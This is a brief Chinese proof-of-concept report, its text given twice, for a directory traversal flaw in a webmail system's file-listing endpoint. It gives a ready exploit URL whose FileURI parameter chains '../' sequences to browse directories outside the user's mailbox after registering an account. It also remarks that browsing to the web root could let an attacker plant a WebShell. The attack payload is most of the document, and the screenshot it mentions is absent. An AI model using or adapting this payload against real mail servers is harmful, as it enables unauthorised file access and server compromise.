POC:
目录遍历,如果是子目录的话可以考虑,浏览主目录拿WebShell。
注册登陆邮箱系统
|
Exp: http://mail.xxxx.com.cn/webmail/emfile?action=file&todo=displayfolderfiles&FileURI=%2F.Files%2F.test/../../../../../../../../../../%2C%2C0 |
截图如下:
POC:
目录遍历,如果是子目录的话可以考虑,浏览主目录拿WebShell。
注册登陆邮箱系统
|
Exp: http://mail.xxxx.com.cn/webmail/emfile?action=file&todo=displayfolderfiles&FileURI=%2F.Files%2F.test/../../../../../../../../../../%2C%2C0 |
截图如下: